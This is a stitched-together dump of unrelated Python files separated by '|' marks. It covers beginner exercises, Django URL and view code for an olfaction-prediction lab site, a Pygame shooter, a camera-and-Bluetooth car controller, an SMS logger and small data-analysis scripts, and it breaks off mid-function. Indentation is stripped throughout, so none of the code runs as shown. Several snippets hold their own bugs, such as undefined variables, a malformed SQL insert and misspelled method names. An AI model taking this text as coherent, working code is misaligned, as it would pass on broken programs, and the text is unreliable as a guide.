print("%s님 : %d살 ==> 성인"%(i, people[i]))
adult.append(i)
print("성인 : %s"%adult)
print("미성년자 : %s"%minor)
|
def factorial(n):
space = ' ' * (4 * n)
print (space, 'factorial', n)
if n == 0:
print (space, 'returning 1')
return 1
else:
recurse = factorial(n-1)
result = n * recurse
print (space, 'returning', result)
return result
factorial(5)
def b(z):
prod = a(z, z)
print (z, prod)
return prod
def a(x, y):
x = x + 1
return x * y
def c(x, y, z):
total = x + y + z
square = b(total)**2
return square
x = 1
y = x + 1
print(c(x, y+3, x+y))
def test_function( length, width, height):
print ("the area of the box is ", length*width*height)
return length*width*height
l = 12.5
w = 5
h = 2
test_function(l, w, h)
print ("The area of the box is ", length*width*height)
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^house/$', views.user_profile, name='user_profile'),
url(r'^login/$', views.user_login, name='user_login'),
url(r'^demo-login/$', views.demo_login, name='demo_login'),
url(r'^logout/$', views.user_logout, name='user_logout'),
url(r'^register/$', views.register_user, name='register_user'),
] |
import requests
import cognitive
mic_device = "plughw:1"
cognize = None
# Check whether your Raspberry Pi is connected to the internet
def internet_on():
print "Checking Internet Connection"
try:
r = requests.get('http://iamawesome.com')
print "All systems GO"
return True
except:
print "Connection Failed"
return False
def init():
global cognize
cognize = cognitive.doit
|
import android
import sqlite3
import datetime
droid = android.Android()
textFrom = droid.getIntent().result['%SMSRF']
textName = droid.getIntent().result['%SMSRN']
textBody = droid.getIntent().result['%SMSRB']
textDate = datetime.date.isoformat()
textTime = droid.getIntent().result['%SMSRT']
conn = sqlite3.connect('/sdcard/MyRec/MyRec.db')
cur = conn.cursor()
cur.execute("Insert into TextMessages([date], [time],inout, sender, sender_name, msg) values " \
"(textDate, textTime, 'in', textFrom, textName, textBody)"
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
题目:将一个列表的数据复制到另一个列表中。
"""
a = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print a
b = a
print b
c = a[:]
print b
a.reverse()
print a
|
import pygame
import pygame.camera
from pygame.locals import *
from datetime import datetime
import cv2
from BluetoothCom import BluetoothComm
# Steering angle must be from -180 to 180
# to small current anle
# capsule net
# fine tuning
DEVICE = '/dev/video0'
SIZE = (640, 480)
FOLDER = 'GroundFloor6/'
serverMACAddress = '00:15:83:35:99:09'
bluetoothServer = BluetoothComm(serverMACAddress, False)
def preprocess(img):
rows, cols, _ = img.shape
M = cv2.getRotationMatrix2D((cols / 2, rows / 2), -90, 1.4)
dst = cv2.warpAffine(img, M, (cols, rows), flags=cv2.INTER_AREA)
crop_img = dst[59:-1, :]
x = cv2.resize(crop_img, (32, 16))
return x
def camstream():
# initialising pygame display
pygame.init()
display = pygame.display.set_mode(SIZE, 0)
# initialising camera
pygame.camera.init()
camera = pygame.camera.Camera(DEVICE, SIZE)
camera.start()
# initialising joystick
pygame.joystick.init()
joystick = pygame.joystick.Joystick(0)
joystick.init()
joysticks = [pygame.joystick.Joystick(x) for x in range(pygame.joystick.get_count())]
print(joysticks)
from keras.models import load_model
model = load_model('../model_small.json')
# Used to manage how fast the screen updates
clock = pygame.time.Clock()
screen = pygame.surface.Surface(SIZE, 0, display)
capture = True
recording = False
x = 0
y = 0
while capture:
screen = camera.get_image(screen)
display.blit(screen, (0, 0))
pygame.display.flip()
l = FOLDER + str(datetime.now()) + "--" + "s1" + "--" + "s1" + ".jpg"
pygame.image.save(screen, l)
img = cv2.imread(l)
img = preprocess(img)
leftright = -round(model.predict(img[None,:,:,:])[0][0],4)
print ("predicted: " + str(leftright))
leftright = int(translate(leftright, -0.2, 0.2, 0, 180))
print leftright
angleInfo = 'a' + formatAngle(leftright)
bluetoothServer.send(angleInfo)
for event in pygame.event.get():
lf = -joystick.get_axis(0)
leftright = int(translate(lf, -1, 1, 0, 180))
angleInfo = 'a' + formatAngle(leftright)
# speedInfo = 's' + formatSpeed(updown)
a = joystick.get_button(0)
b = joystick.get_button(2)
x = ''
if (a == 1):
x = 's1'
elif (b == 1):
x = 's2'
else:
x = 's3'
# bluetoothServer.send(angleInfo)
bluetoothServer.send(x)
if event.type == QUIT:
capture = False
# i:0 -> 1
# i:1 -> 2
# i:2 -> 3
# i:3 -> 4
# i:4 -> L1
# i:5 -> R1
# i:6 -> L2
# i:7 -> R2
if event.type == pygame.JOYBUTTONDOWN:
if joystick.get_button(5) == 1:
# R1
recording = True
print("recording status : " + str(recording))
if joystick.get_button(7) == 1:
# R2
recording = False
print("recording status : " + str(recording))
if joystick.get_button(4) == 1 or joystick.get_button(6) == 1:
# L1 or L2
recording = False
bluetoothServer.send("s3")
print ("Stoping car and recording")
clock.tick(60)
camera.stop()
pygame.quit()
return
def saveImage(img, event_angle, updown, recording):
pygame.image.save(img, FOLDER + str(datetime.now()) + "--" + str(event_angle) + "--" + str(updown) + ".jpg")
def formatAngle(x):
# x = x*90
# if x >= 0:
# x = x + 90
# else:
# x = x + 90
# x = round(x,0)
# x = int(x)
x = str(x)
if len(x) == 1:
return '00' + x
if len(x) == 2:
return '0' + x
return x
def formatSpeed(x):
if x < 0:
x = 2 # back
elif x > 0:
x = 1 # forward
else:
x = 3 # stop
return str(x)
def translate(value, leftMin, leftMax, rightMin, rightMax):
# Figure out how 'wide' each range is
leftSpan = leftMax - leftMin
rightSpan = rightMax - rightMin
# Convert the left range into a 0-1 range (float)
valueScaled = float(value - leftMin) / float(leftSpan)
# Convert the 0-1 range into a value in the right range.
return rightMin + (valueScaled * rightSpan)
if __name__ == '__main__':
camstream()
|
"""
Given an m x n matrix, return all elements of the matrix in spiral order.
Input: matrix = [[1,2,3],[4,5,6],[7,8,9]]
Output: [1,2,3,6,9,8,7,4,5]
Input: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
Output: [1,2,3,4,8,12,11,10,9,5,6,7]
"""
from typing import List
class Solution:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
print(matrix)
start = 0
vend = len(matrix[0]) - 1
hend = len(matrix) - 1
k = 0
out = []
while start <= hend:
if vend >= start and k % 4 == 0:
for i in range(start, vend + 1):
print(matrix[start][i])
out.append(matrix[start][i])
k = k + 1
if hend > start and k % 4 == 1:
for i in range(start + 1, hend + 1):
out.append(matrix[i][vend])
k = k + 1
if vend > start and k % 4 == 2:
for i in range(vend - 1, start - 1, -1):
out.append(matrix[hend][i])
k = k + 1
if hend >= start and k % 4 == 3:
for i in range(hend - 1, start, -1):
out.append(matrix[i][start])
k = k + 1
start = start + 1
vend = vend - 1
hend = hend - 1
return out
class Solution2:
def spiralOrder(self, matrix: List[List[int]]) -> List[int]:
start_row = 0
start_col = 0
end_row = len(matrix) - 1
if len(matrix) == 0:
return
end_col = len(matrix[0]) - 1
movement = ['R', 'D', 'L', 'U']
out = []
spiral_traverse_matrix(matrix, 0, start_row, start_col, end_row, end_col, out, movement)
return out
def spiral_traverse_matrix(matrix, index, start_row, start_col, end_row, end_col, out, movement):
print(matrix, index, start_row, start_col, end_row, end_col)
print(start_row >= end_row)
print(start_col >= end_col)
if end_row < 0 or end_col < 0:
return
if start_row > end_row or start_col > end_col:
return
op = movement[index % len(movement)]
print(op)
if op == 'R':
for i in range(start_col, end_col + 1):
print(matrix[start_row][i])
out.append(matrix[start_row][i])
return spiral_traverse_matrix(matrix, index + 1, start_row + 1, start_col, end_row, end_col, out, movement)
elif op == 'D':
for i in range(start_row, end_row + 1):
print(matrix[i][end_col])
out.append(matrix[i][end_col])
return spiral_traverse_matrix(matrix, index + 1, start_row, start_col, end_row, end_col - 1, out, movement)
elif op == 'L':
print(end_col, start_col)
for i in range(end_col, start_col - 1, -1):
print(matrix[end_row][i])
out.append(matrix[end_row][i])
return spiral_traverse_matrix(matrix, index + 1, start_row, start_col, end_row - 1, end_col, out, movement)
elif op == 'U':
for i in range(end_row, start_row - 1, -1):
print(matrix[i][start_col])
out.append(matrix[i][start_col])
return spiral_traverse_matrix(matrix, index + 1, start_row, start_col + 1, end_row, end_col, out, movement)
matrix = [[1,2,3],[4,5,6],[7,8,9]]
print ("Input : {}".format(matrix))
ans = Solution().spiralOrder(matrix)
print ("Solution : {}".format(ans))
matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
print ("Input : {}".format(matrix))
ans = Solution().spiralOrder(matrix)
print ("Solution : {}".format(ans))
|
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Qotto, 2019
from aiokafka import TopicPartition
from tonga.models.records.event.event import BaseEvent
from tonga.models.handlers.event.event_handler import BaseEventHandler
from typing import Union
__all__ = [
'TestEventHandler'
]
class TestEventHandler(BaseEventHandler):
def __init__(self) -> None:
pass
@classmethod
def handler_name(cls) -> str:
return 'tonga.test.event'
async def handle(self, event: BaseEvent, tp: TopicPartition, group_id: str, offset: int) -> Union[str, None]:
raise NotImplementedError
|
def result(scores):
th = scores[1:4]
if th[2] - th[0] >= 4:
return "KIN"
else:
return sum(th)
for _ in range(int(input())):
scores = sorted(list(map(int, input().split())))
print(result(scores))
|
sum=0
for i in range(1,51):
sum=sum+i
print("sum is:",sum) |
import pandas as pd
from textblob import TextBlob
data = pd.read_csv('/Users/enyaning/Desktop/BIA660/BIA660_TEAM_2/test.csv')
arr = []
for index, row in data.iterrows():
blob = TextBlob(row['sentence'])
arr.append({
'phrase': row['phrase'],
'polarity': blob.sentences[0].sentiment.polarity,
'restaurantId': row['restaurantId'],
'review_id': row['review_id'],
'sentence_id': row['sentence_id'],
'sentence': row['sentence']
})
df = pd.DataFrame(arr)
df.to_csv('test_polarity.csv')
|
from PyQt4 import QtCore, QtGui, uic
class dropdown(QtGui.QDialog):
def reto(self):
return self.comboBox.currentText()
def __init__(self,lista):
QtGui.QDialog.__init__(self)
uic.loadUi("drop_down.ui",self)
self.comboBox.addItems(lista)
self.comboBox.activated.connect(self.reto) |
from django.urls import path, include
from django.conf.urls.static import static
from . import views
urlpatterns = [
path('', views.homepage, name='homepage'),
path('index', views.homepage, name='homepage'),
path('publications', views.publications, name='publications'),
path('alumni', views.alumni, name='alumni'),
path('contact', views.contact, name='contact'),
path('joinus', views.positionsjoin, name='joinus'),
path('phd_students', views.phdstudents, name='phdstudents'),
path('pi', views.pi, name='pi'),
path('project1', views.project1, name='project1'),
path('result', views.result, name='result'),
path('research', views.research, name='research'),
path('researchers',views.researchers, name='researchers'),
path('shiladit', views.shiladit, name='shiladit'),
path('students', views.students, name='students'),
path('team', views.students, name='team'),
]
|
#!/usr/local/bin/python
import sys
import random
import pygame
from pygame.locals import *
from src.cdp.Personagens import Personagem
from src.cih import Impressao
from src.cih import JanelaMenu
from src.util.Build import (NavePerdidaBuilder, NaveFugaBuilder, NaveGrupoBuilder,
NavePeaoBuilder, NavePersegueBuilder, NaveJogadorBuilder)
# -------------------------------------------------------------------------------
# Name: Nave Maluca 2.1
# Author: Gislaine e Izabely
# Created: 09/29/2015
# Copyright: (c) Gislaine e Izabely 2015
# Licence: GIZ
# -------------------------------------------------------------------------------
__author__ = 'Gislaine e Izabely'
pygame.init()
pygame.font.init()
WIDTH = 1000
HEIGTH = 600
LIM_WIDTH = WIDTH - 65
LIM_HEIGTH = HEIGTH - 50
WHITE = (255, 255, 255)
FPS = 60
def start_controle_som():
pygame.mixer.pre_init(44100, 32, 2, 4096)
pygame.mixer.init(frequency=22050, size=-16, channels=2, buffer=4096)
# return pygame.mixer.Sound("MusicNave.wav")
def colisao_naves(nave, inimigos):
area = nave.get_area()
for inimigo in inimigos:
if area.colliderect(inimigo.get_area()):
return True
return False
def colisao_tiro(nave, inimigos):
if inimigos:
for inimigo in inimigos:
area = inimigo.get_area()
for tiro in nave.armamento():
if area.colliderect(tiro.get_area()):
tiro.colisao = True
tiro.ativo = False
inimigo.foi_atingido()
return True
return False
def cria_inimigo(naves_inimigas, num_inimigos):
if len(naves_inimigas) < num_inimigos:
nave_criada = cria_nave_inimigo()
if naves_inimigas:
for inimigo in naves_inimigas:
if not nave_criada.get_area().colliderect(inimigo.get_area):
naves_inimigas.append(nave_criada)
else:
naves_inimigas.append(nave_criada)
return naves_inimigas
def get_evento_saida():
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
sys.exit()
def get_evento_teclado(nave):
tecla = pygame.key.get_pressed()
if tecla[K_UP] or tecla[K_w]:
if nave.get_posicaox() > 0:
nave.set_posicaoy(nave.get_posicaoy() - 25)
nave.start_area()
elif tecla[K_DOWN] or tecla[K_s]:
if nave.get_posicaoy() < LIM_HEIGTH:
nave.set_osicaoy(nave.get_posicaoy() + 25)
nave.start_area()
elif tecla[K_LEFT] or tecla[K_a]:
if nave.get_posicaox() > 0:
nave.set_posicaox(nave.get_posicaox() - 25)
nave.start_area()
elif tecla[K_RIGHT] or tecla[K_d]:
if nave.get_posicaox() < LIM_WIDTH:
nave.set_posicaox(nave.get_posicaox() + 25)
nave.start_area()
elif tecla[K_SPACE]:
nave.atira()
def run(menu):
relogio = pygame.time.Clock()
loop_principal = True
while loop_principal:
mouse_posicao = pygame.mouse.get_pos()
for event in pygame.event.get():
if event.type == pygame.QUIT:
loop_principal = False
pygame.quit()
if event.type == pygame.KEYDOWN:
menu.mouse_visivel = False
menu.set_selecao_teclado(event.key)
if event.type == pygame.MOUSEBUTTONDOWN:
for item in menu.itens:
if item.mouse_selecionado(mouse_posicao[0], mouse_posicao[1]):
menu.funcoes[item.text]()
if pygame.mouse.get_rel() != (0, 0):
menu.mouse_visivel = True
menu.item_atual = None
menu.set_visibilidade_mouse()
for item in menu.itens:
if menu.mouse_visivel:
menu.set_selecao_mouse(item, mouse_posicao[0], mouse_posicao[1])
menu.tela.blit(item.label, (item.pos_x, item.pos_y))
pygame.display.flip()
relogio.tick(FPS)
def menu_fim():
saida = Impressao.Impressao()
tela = saida.imprime_texto_fim()
menu_itens = ("Novo Jogo", "Sair")
funcoes = {"Novo Jogo": jogar, "Sair": sys.exit}
tam_fonte = 30
fonte_nome = pygame.font.get_default_font()
menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcoes, fonte_nome, tam_fonte, WHITE)
run(menu)
def menu_instrucao():
saida = Impressao.Impressao()
tela = saida.imprime_instrucao()
menu_itens = ("Voltar", "Iniciar")
funcs = {"Voltar": menu_inicial(), "Iniciar": jogar}
tam_fonte = 30
font_name = pygame.font.get_default_font()
menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcs, font_name, tam_fonte, WHITE)
run(menu)
def menu_inicial():
saida = Impressao.Impressao()
tela = saida.start_tela_menu()
menu_itens = ("Iniciar Jogo", "Instruções", "Sair")
funcs = {"Iniciar Jogo": jogar, "Sair": sys.exit, "Instruções": menu_instrucao()}
tam_fonte = 30
font_name = pygame.font.get_default_font()
menu = JanelaMenu.JanelaMenu(tela, menu_itens, funcs, font_name, tam_fonte, WHITE)
run(menu)
def move_tiro(nave):
if nave.armamento():
for tiro in nave.armamento():
tiro.atira()
def remove_tiro(nave):
if nave.armamento():
for tiro in nave.armamento():
if tiro.colisao or not tiro.ativo:
nave.remove_tiro(tiro)
def jogar():
pygame.init()
pygame.font.init()
saida = Impressao.Impressao()
nave = cria_nave()
colisao = False
num_inimigos = 10
naves_inimigas = []
relogio = pygame.time.Clock()
while True:
get_evento_saida()
if not colisao:
naves_inimigas = cria_inimigo(naves_inimigas, num_inimigos)
get_evento_teclado(nave)
carregar()
colisao = colisao_naves(nave, naves_inimigas)
move_nave_inimiga(naves_inimigas)
move_tiro(nave)
for m in nave.armamento():
saida.telao.blit(m.figura(), (m.get_posicao_x(), m.get_posicao_y()))
remove_naves_inimigas(naves_inimigas)
remove_tiro(nave)
for n in naves_inimigas:
saida.telao.blit(n.figura(), (n.get_posicao_x(), n.get_posicao_y()))
saida.telao.blit(nave.figura(), (nave.get_posicao_x(), nave.get_posicao_y()))
explosao = colisao_tiro(nave, naves_inimigas)
if explosao:
remove_tiro(nave)
remove_naves_inimigas(naves_inimigas)
else:
menu_fim()
pygame.display.update()
relogio.tick(FPS)
def toca_musica(som):
som.set_volume(0.1)
som.play()
def move_nave_inimiga(naves_inimigas):
if naves_inimigas:
for inimigo in naves_inimigas:
inimigo.move()
def remove_naves_inimigas(naves_inimigas):
if naves_inimigas:
for inimigo in naves_inimigas:
if inimigo.get_posicao_y() > HEIGTH or inimigo.atingido():
naves_inimigas.remove(inimigo)
def carregar():
Impressao.Impressao()
def cria_nave():
nave_escolhida = NaveJogadorBuilder.NaveJogadorBuilder()
n = Personagem.Personagem.criando_nave(nave_escolhida)
n.set_posicaox(LIM_WIDTH / 2)
n.set_posicaoy(LIM_HEIGTH)
n.start_area()
return n
def cria_nave_inimigo():
aleatorio = random.randint(0, 20)
if 0 <= aleatorio <= 3:
nave_escolhida = NavePersegueBuilder.NavePersegueBuilder()
elif 4 <= aleatorio <= 8:
nave_escolhida = NavePeaoBuilder.NavePeaoBuilder()
elif 9 <= aleatorio <= 11:
nave_escolhida = NavePerdidaBuilder.NavePerdidaBuilder()
elif 10 <= aleatorio <= 17:
nave_escolhida = NaveGrupoBuilder.NaveGrupoBuilder()
else:
nave_escolhida = NaveFugaBuilder.NaveFugaBuilder()
n = Personagem.Personagem.criando_nave(nave_escolhida)
n.set_posicaoX(random.randrange(LIM_WIDTH - 20))
n.set_posicaoY(0)
n.start_area()
return n
|
#!/usr/bin/env python3
#coding:utf-8
import requests
from lib import root
from src.search import selenium_
from os import system
selenium_ = selenium_()
browser = selenium_.browser
browser_ = selenium_.browser_
google_search = selenium_.Google_Search
class spider(object):
def __init__(self):
self.root = root
def main(self,keyword):
results = google_search(keyword=keyword,number=2)
i = 0
system('mkdir {}lib/doc_image/pyautogui'.format(self.root))
for result in results:
# title = result[0]
link = result[1]
html_doc = requests.get(link).text
with open('{}lib/doc_image/pyautogui/{}'.format(self.root,'pyautogui{}.html'.format(str(i))),'a+') as w:
w.write(html_doc)
i += 1
def run(self):
self.main(keyword='site:pyautogui.readthedocs.io')
if __name__ == '__main__':
s = spider()
s.run()
browser.quit()
browser_.quit()
|
#!/usr/bin/env python
from final.Database import Database
from final.LSA import LSA
from final.Set import Set
from final.NaiveBayesClassifier import NaiveBayesClassifier
import numpy
###############################################################################
# Initializing
###############################################################################
db = Database()
print("Data imported.")
MIN_FREQ = 3
MAX_GRAM = 5
P_EIG = 0.95
alpha = [1e-10, 1, 0.5, 0.1, 0.05, 0.01, 0.005]
y = []
y_error_min = []
y_error_max = []
test_score = []
###############################################################################
###############################################################################
# Latent Semantic Analysis
###############################################################################
lsa = LSA(MAX_GRAM, MIN_FREQ, P_EIG)
lsa_results = lsa.process_utterances_through_lsa(db.human_utterances)
print("LSA Results computed.")
###############################################################################
###############################################################################
# Data Division
sets = Set(lsa_results, db.robot_ids, db.human_utterances, n_splits=5)
###############################################################################
###############################################################################
# Naive Bayes Classifier
###############################################################################
for a in alpha:
print("alpha = ", a)
for i in range(len(sets.lsa_vectors_train)):
naive = NaiveBayesClassifier(alpha=a)
naive.learning_phase(numpy.array(sets.lsa_vectors_train[i]), sets.robot_ids_train[i])
###############################################################################
###############################################################################
# Computing the results of the experiment
###############################################################################
test_score.append(naive.test_score(numpy.array(sets.lsa_vectors_test[i]), numpy.array(sets.robot_ids_test[i])))
avg = numpy.round(numpy.average(numpy.array(test_score)), 2)
y.append(avg)
min_ = numpy.round(numpy.array(test_score).min(initial=0), 2)
y_error_min.append(numpy.round(avg - min_, 2))
max_ = numpy.round(numpy.array(test_score).max(initial=0), 2)
y_error_max.append(numpy.round(max_ - avg, 2))
print("Avg test performance: ", avg)
print(min_)
print(max_)
print('\n'*3)
print("y = ", y)
print("yerrormin = ", y_error_min)
print("yerrormax = ", y_error_max)
###############################################################################
|
from uuid import uuid4
from pandas.core.frame import DataFrame
from htmlmin.decorators import minified_response
import datetime
from django.utils import timezone
import pytz
from django.http import request
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.http import JsonResponse
import pandas as pd
import os
import shutil
from .models import queuedisp, result, disp, disp4, disp2, disp3
from zipfile import ZipFile
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
import traceback
import uuid
root = os.path.abspath('./')
def get_id(request):
if 'id' in request.session:
return str(request.session['id'])[:10]
else:
id = uuid.uuid4()
request.session['id'] = str(id.int)[:10]
return str(id.int)[:10]
def fastaformat(s):
t = []
temp = ""
for i in s[1:]:
if i.startswith(">"):
t.append(temp)
temp = ""
continue
temp = temp + i
t.append(temp)
return t
def writeresult(a, job_name):
temp = f'{job_name}/temp.txt'
result = f"{job_name}/result.txt"
with open(result, 'r') as f:
with open(temp, 'w') as f2:
f2.write(f"{a.job_name}\n")
f2.write(f"{a.count}\n")
f2.write(f"{a.model}\n")
f2.write(f"{a.id}\n")
f2.write(f.read())
try:
os.rename(temp, result)
except WindowsError:
os.remove(result)
os.rename(temp, result)
def readresult(user):
with open(f"{user}/result.txt", 'r') as f: # the current directory is generated
s = result()
s.job_name = f.readline().replace("\n", "")
if len(s.job_name) == 0:
return
else:
s.count = int(f.readline().replace("\n", ""))
s.model = int(f.readline().replace("\n", ""))
s.id = (f.readline().replace("\n", ""))
return s
def check_user(request):
os.chdir(root)
id = str(get_id(request))
generated = "olfy/static/olfy/generated"
if os.path.isfile(f"{generated}/session.csv"):
data = pd.read_csv(f"{generated}/session.csv")
list1 = list(map(str, list(data["id"])))
if id not in list1:
data = data.append(
{"id": str(id), "date": request.session.get_expiry_date()}, ignore_index=True)
data.to_csv(f"{generated}/session.csv", index=False)
else:
temp = {"id": [id], "date": [request.session.get_expiry_date()]}
data = pd.DataFrame(temp)
data["id"].map(str)
data.to_csv(f"{generated}/session.csv", index=False)
if not os.path.isdir(f"{generated}/{id}"):
os.makedirs(f"{generated}/{id}/m1")
os.makedirs(f"{generated}/{id}/m2")
os.makedirs(f"{generated}/{id}/m3")
os.makedirs(f"{generated}/{id}/m4")
f = open(f"{generated}/{id}/result.txt", 'w')
f.close()
return id
def loadingpage(request):
os.chdir(root)
return render(request, "olfy/Ahuja labs website/loading.html", {'hide': 'd-none'})
@minified_response
def home(request):
check_user(request)
os.chdir(root)
context = {
'hide': 'd-none'
}
return render(request, "olfy/Ahuja labs website/index.html", context)
@minified_response
def displaymodels(request):
check_user(request)
return render(request, "olfy/Ahuja labs website/modelsList.html")
@minified_response
def about(request):
os.chdir(root)
context = {
'team': [
{
'name': 'Dr. Gaurav Ahuja',
'post': 'Principal Investigator',
'email': 'gaurav.ahuja@iiitd.ac.in',
'image': 'Gaurav.jpg'
},
{
'name': 'Dr. Tripti Mishra',
'post': 'Intellectual Contribution',
'email': 'mistripti01@gmail.com',
'image': 'Tripti.png'
},
{
'name': 'Vishesh Agrawal',
'post': 'Deep Learning & Interpretability',
'email': 'vishesh18420@iiitd.ac.in',
'image': 'Vishesh.png'
},
{
'name': 'Ria Gupta',
'post': 'Deep Learning & Interpretability',
'email': 'ria18405@iiitd.ac.in',
'image': 'Ria.png'
},
{
'name': 'Rishi Raj Jain',
'post': 'Lead Design & Development',
'email': 'rishi18304@iiitd.ac.in',
'image': 'Rishi.jpg'
},
{
'name': 'Sushant Gupta',
'post': 'Back-End Development ',
'email': 'sushant19450@iiitd.ac.in',
'image': 'Sushant.jpg'
},
{
'name': 'Aayushi Mittal',
'post': 'Data Collection & Design',
'email': 'aayushim@iiitd.ac.in',
'image': 'Aayushi.jpg'
},
{
'name': 'Krishan Gupta',
'post': 'Deep Learning Testing',
'email': 'krishang@iiitd.ac.in',
'image': 'Krishan.jpg'
},
{
'name': 'Prakriti Garg',
'post': 'Testing',
'email': 'prakriti19439@iiitd.ac.in',
'image': 'Prakriti.jpg'
},
{
'name': 'Sanjay Kumar Mohanty',
'post': 'Testing',
'email': 'sanjaym@iiitd.ac.in',
'image': 'Sanjay.jpg'
},
{
'name': 'Riya Sogani',
'post': 'Web Development & Testing',
'email': 'riya19442@iiitd.ac.in',
'image': 'Riya.jpg'
},
{
'name': 'Sengupta Labs',
'post': 'Collaboration',
'email': 'debarka@iiitd.ac.in',
'image': 'Sengupta.png'
}
]
}
return render(request, "olfy/Ahuja labs website/about.html", context)
@minified_response
def help(request):
os.chdir(root)
check_user(request)
context = {
'tabledata': [
{
'name': 'Odorant Predictor',
'columnames': 'SMILES',
'extension': '*.csv'
},
{
'name': 'OR Finder',
'columnames': 'SMILES',
'extension': '*.csv'
},
{
'name': 'Odor Finder',
'columnames': 'Header of FASTA file, Receptor Sequence',
'extension': '*.csv'
},
{
'name': 'Odorant-OR Pair Analysis',
'columnames': 'SMILES, Header of FASTA file, Receptor Sequence',
'extension': '*.csv'
}
],
'outputData': [
{
'name': 'Prediction Probability',
'extension': 'This is the confidence of the prediction being true'
},
{
'name': 'Receptor Sequence Interpretability',
'extension': 'A bar graph representation of relevant amino acids in receptor sequence contributing towards the prediction'
},
{
'name': 'SMILES Interpretability (Bar Graph)',
'extension': 'A bar graph representation of relevant atoms in ligands contributing towards the prediction'
},
{
'name': 'SMILES Interpretability (Structure)',
'extension': 'Substructure Analysis of the ligand (SMILES) highlighting relevant atoms contributing towards the prediction'
}
],
'troubleshoot': [
{
'ques': 'If I log out of my browser, would my history remain saved?',
'ans': 'Yes, your history will remain saved up to 7 days, till you choose to clear your cookies in the browser cache.'
},
{
'ques': 'Can I run 2 prediction models from different tabs of the same browser?',
'ans': 'No.'
},
{
'ques': 'Can I navigate away from the loading screen?',
'ans': 'We understand that it can be a little time consuming, considering the high computations. Please try to be patient, and do not navigate away from the loading screen to get your results. You could, however, add your email address to receive your results.'
},
{
'ques': 'What if I add more than 25 entries?',
'ans': 'We only select the first 25 entries as input.'
},
{
'ques': 'The result page shows a table of only ‘NA’ entries. What does this mean?',
'ans': "Don't worry, NA stands for Not Applicable, which indicates that for the given input, there are no ligands/receptors which can bind to the input receptor/ligand with the given input parameters."
},
{
'ques': 'How do I interpret my results?',
'ans': 'The results can be interpreted in three ways: based on Receptor Sequence, based on SMILES & based on Structure Based. The colors in the structure and graphs, green and red represent positive and negative contribution towards the binding, respectively.'
},
{
'ques': 'I set the counter value of Top-K to be ‘x’, but I receive ‘y’ output records (y<x)?',
'ans': "The value of ‘K’ only sets an upper bound of the number of outputs you can get. It is possible to have fewer receptors binding a given input smile than K, or vice versa."
},
{
'ques': 'What does the threshold mean?',
'ans': "In OR finder, we have used a Tanimoto similarity threshold to find SMILES similar within that threshold. Setting a lower threshold would produce more output records."
},
{
'ques': 'How to set a job title? Can I have special characters in my title?',
'ans': "Yes, all characters are fit for job titles. We recommend using meaningful job names to keep track of the job. You can see the sample input for more information."
},
{
'ques': 'What is the prediction based on?',
'ans': "The prediction is based on Deep Learning Models."
}
]
}
return render(request, "olfy/Ahuja labs website/help.html", context)
def results(request):
if request.method == "GET":
os.chdir(root)
id = check_user(request)
user = f"olfy/static/olfy/generated/{id}"
a = readresult(user)
if a is None:
return render(request, "olfy/Ahuja labs website/results.html", {"z": False})
if a.model == 1:
s = f'{user}/m1/{a.job_name}/predicted_output.csv'
data = pd.read_csv(s)
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
number_of_rows = len(data)
display = []
for i in range(number_of_rows):
b = disp()
b.smiles = data["SMILES"][i]
b.prob = str(data["prob"][i])[0:5]
b.sno = i + 1
temp = data["pred_odor"][i]
if temp == 1:
odor = "Odorant"
else:
odor = "Non-Odorant"
b.odor = odor
display.append(b)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(s, index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": [{"row": display}], "id": True, "flag": "0"})
elif a.model == 2:
display = []
for i in range(a.count):
data = pd.read_csv(f'{user}/m2/{a.job_name}/{i+1}/output.csv')
number_of_rows = len(data)
temp = {}
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
data.rename(
columns={'Final_Sequence': 'Sequence'}, inplace=True)
temp["smiles"] = data["SMILES"][0]
temp1 = []
for j in range(number_of_rows):
b = disp2()
b.sno = j + 1
if "Empty" == data["Probability"][j]:
b.seq = "NA"
b.receptorname = "NA"
b.prob = "NA"
b.noresult = True
else:
b.seq = data["Sequence"][j]
b.receptorname = data["Receptor"][j]
b.prob = str(data["Probability"][j])[0:5]
b.tableno = i + 1
temp1.append(b)
temp["row"] = temp1
display.append(temp)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(
f'{user}/m2/{a.job_name}/{i+1}/output.csv', index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": "0"})
elif a.model == 3:
display = []
for i in range(a.count):
data = pd.read_csv(f'{user}/m3/{a.job_name}/{i+1}/output.csv')
data.rename(columns={'Smiles': 'SMILES'}, inplace=True)
data.rename(columns={'seq': 'Sequence'}, inplace=True)
number_of_rows = len(data)
temp = {}
temp["seq"] = (data["header"][0])
temp1 = []
for j in range(number_of_rows):
b = disp3()
b.sno = j + 1
if "Empty" == data["Probability"][j]:
b.smiles = "NA"
b.prob = "NA"
b.noresult = True
else:
b.smiles = data["SMILES"][j]
b.prob = str(data["Probability"][j])[0:5]
b.tableno = i + 1
temp1.append(b)
temp["row"] = temp1
display.append(temp)
col = [i for i in range(1, len(data) + 1)]
if "S.No" not in data:
data.insert(0, 'S.No', col)
data.to_csv(
f'{user}/m3/{a.job_name}/{i+1}/output.csv', index=False)
return render(request, "olfy/Ahuja labs website/results.html", {"result": a, "z": True, "display": display, "id": True, "flag": "0"})
elif a.model == 4:
s = f'{user}/m4/{a.job_name}/output.csv'
data = pd.read_csv(s)
data.rename(columns={'seq': 'Sequence'}, inplace=True)
data.rename(columns={'smiles': 'SMILES'}, inplace=True)
number_of_rows = len(data)
display = []
for i in range(number_of_rows):
